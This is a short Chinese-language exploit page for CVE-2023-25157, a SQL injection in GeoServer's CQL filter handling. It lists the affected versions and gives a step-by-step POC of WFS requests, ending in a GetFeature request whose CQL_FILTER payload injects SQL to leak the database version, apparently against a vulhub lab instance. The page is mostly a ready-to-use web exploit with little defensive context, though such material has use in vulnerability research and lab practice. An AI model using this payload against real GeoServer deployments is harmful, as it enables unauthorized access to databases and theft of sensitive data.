Exploit for SQL Injection in Osgeo Geoserver CVE-2023-25157

## https://sploitus.com/exploit?id=F3EA0D5D-8DD1-5A7C-A39A-B48AF7A8B470
## 漏洞描述
由于未对用户输入进行过滤，远程未授权攻击者可以构造畸形的过滤语法，绕过GeoServer的词法解析从而造成SQL注入，获取服务器中的敏感信息，甚至可能获取数据库服务器权限。

## 影响版本
GeoServer 2.20.x < 2.20.7

GeoServer 2.19.x < 2.19.7

GeoServer 2.18.x < 2.18.7

GeoServer 2.21.x < 2.21.4

GeoServer 2.22.x < 2.22.2

## POC
#### 获取可用的功能名称
搜索

```yaml
/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities
```

![](https://cdn.nlark.com/yuque/0/2025/png/2623554/1745478538674-9e9658be-daed-46ec-8592-b58745cab09f.png)

#### 获取相关可用功能的可用属性
`vulhub:example `功能名称获取相关的属性

```plain
/geoserver/wfs?request=DescribeFeatureType&version=2.0.0&service=WFS&outputFormat=application/json&typeName=vulhub:example
```

![](https://cdn.nlark.com/yuque/0/2025/png/2623554/1745480831082-8508e1b5-aff1-4590-8a26-bdff11154967.png)





```plain
/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith(name,'x'')+=+true+and+1=(SELECT+CAST+((SELECT+version())+AS+INTEGER))+--+')+=+true
```

![](https://cdn.nlark.com/yuque/0/2025/png/2623554/1745483611728-98f0193a-8d04-4519-977e-bc7f947f4533.png)



![](https://cdn.nlark.com/yuque/0/2025/png/2623554/1745460301680-931c8787-e482-4065-933e-af838e7b3dfd.png)

![](https://cdn.nlark.com/yuque/0/2025/png/2623554/1745460322784-6e119577-78cf-4fc4-921a-bab67a970253.png)


![](https://cdn.nlark.com/yuque/0/2025/png/2623554/1745486139109-e1f1ae0c-2956-4167-80f7-ff01920e1b3b.png)